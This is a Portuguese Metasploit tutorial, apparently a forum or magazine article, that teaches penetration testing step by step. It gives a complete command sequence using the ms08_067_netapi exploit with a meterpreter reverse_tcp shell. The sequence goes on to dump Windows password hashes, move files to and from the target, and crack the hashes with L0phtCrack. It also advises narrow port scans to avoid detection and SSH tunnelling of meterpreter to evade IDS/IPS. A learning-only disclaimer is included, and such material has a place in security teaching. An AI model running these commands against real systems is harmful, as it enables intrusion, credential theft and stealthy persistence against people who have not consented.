Metasploit
Metasploit
Metasploit
Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho
realidade
Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele.
Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável
pelos seus actos.
De qualquer forma, e devido a certos requisitos dos testes de intrusão deverão usar
sempre proxy a não ser que usem um Lab com VM´s
Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que
simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos
(msfcl)
Vou usar o linux mas há também a versão para windows. Então levando em
consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista
sobre a utilização desta SUPER PODEROSA FERRAMENTA... um sonho tornado
realidade... para mim que ainda me lembro quando para fazer isto era preciso dezenas
de tools e procedimentos... agora tá tudo integrado numa plataforma/framework.
Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para
que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de
exploitation. Mas basta seleccionar outros exploits para as novas coisinhas...
Vejam também a, digamos, o irmão web que é a excelente w3af "Web Application
Attack and Audit Framework."
Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me
nos dois e é melhor trabalhar com as duas em conjunto.
O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês
explorarem... explorem os payloads, os exploits e todos os outros utilitários. Podem
fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo "show payloads"
ou "show exploits", entre outros.)
Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do
detector de vulnerabilidades automático, o NeXpose Community Edition... ele detecta
as vulnerabilidades e integra-se com o metasploit.
http://www.rapid7.com/vulnerability-scanner.jsp
Podem, como eu, usar o Nessus para isso ou outras ferramentas... hoje até o nmap têm
scripts para detectar vulnerabilidades, que são a principal questão no exploitation... é a
partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do
software alvo e do SO... em alguns casos no windows até a língua em que o windows
esta.
Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do
mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma
vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan
especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguém
tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um
scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que
é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser
que não haja qualquer equipamento especial, como acontece na maioria dos datacenters
para as contas mais baixas. As mais usadas.
http://www.nessus.org/nessus/
O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição -
Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos,
fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades,
mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para
coisas novas.
[root]#./msfconsole
se for no windows só digite msfconsole sem ./, continuando deverá aparecer algo como:
(neste caso já foi usado o comando “show exploits” para se ter uma lista dos exploits. O
comando show serve para outras coisas como payloads e opções. Ver em detalhe)
Para quem dá o primeiro passo pode executar o comando “help” para ver os comandos
de consola. Atenção que isto são apenas os comandos de consola e não todas as suas
funcionalidades.
Como vimos na primeira imagem do metasploit e a nível formativo, pois no mundo a
sério já saberão que exploit usar, será: show [opção] (a opção poderá ser uma das que
vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida
desta forma:
Para saberem quais os exploits que existem nesta framework (desde a ultima
actualização, devem ir actualizando o metasploit que está em constante evolução) basta
digitar o comando:
continuando...
Digitamos o nosso velho amigo : show , novamente para verificar quais atributos ele
aceita . Vejamos:
Exploit Options
===============
Agora deves estar a perguntar... como faço para utilizar isto. Simples, basta configurar o
que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais
complexidade e vectores são adicionados, diferenciando cada vez mais os exploits),
lembrando que onde estiver escrito required, significa que estas opções tem que ser
configuradas obrigatoriamente para o exploit funcionar. Continuando...
Façamos assim:
Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é
que um software acoplado ao exploit para fazer as mais variadas tarefas.
Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show
payloads
http://www.nologin.org/Downloads/Papers/meterpreter.pdf
Assim:
Digite somente: exploit (lindo não? Isto é “disparar” o exploit em direcção ao alvo.
ATENÇÃO. Só usar alvos virtuais ou máquinas vossas
Has passwords estão codificadas mas podem ser “sacadas” e posteriormente crackadas...
garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal.
Por exemplo. Como fazer o dump das hashes das passwords com o meterpreter e fazer o
download para depois as crackarem com algum dos programas anteriormente
mencionados.
.MSFConsole
> use windows/smb/ms08_067_netapi
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST (meu Ip)
> set RHOST (Ip Remoto)
> exploit
> getuid
> hashdump
> use -f cmd -c
Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo
comprometido.
meterpreter> download arquivo1 arquivo2 pastaDestino
meterpreter> upload arquivo1 arquivo2 pastaDestino
Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do "hashdump"
num .txt (meuHash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords
interessantes.
Citação
pwdump is the name of various Windows programs that output the LM and NTLM
password hashes of local user accounts from the Security Account Manager (SAM). In
order to work, it must be run under an Administrator account, or be able to access an
Administrator account on the computer where the hashes are to be dumped; so Pwdump
does not compromise security. Most of these programs are open-source.
Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão
adorar esta forma, que é um GUI (Grafical User Interface... mas no mundo dos exploits?
Sim... vejam)
Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma
pagina web, todas as funcionalidades aplicaveis estão lá.
[root]#./msfweb
+----=[ Metasploit Framework Web Interface (ip:55555)
Deixar correr... Abrir em seguida o browser e digitar o url: teu ip, localhost, 127.0.0.1...
Mais a porta 55555
E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um
pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no
alvo vão (ou não) usar a consola, pois é mais...
Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente
seleccionando.
Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e
podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra
dedicado às novas appliances PANDA
Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o
que vai dentro dessa sessão.
Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o
metasploit)
http://secnow.wordpress.com/2010/04/01/criando-uma-sessao-meterpreter-persistente-a-
partir-de-um-tunel-ssh/
Podem ver muitos videos que até já apresentei alguns, com tudo isto em "real" e muito
mais... investiguem por ai, pois há magia no ar
teckV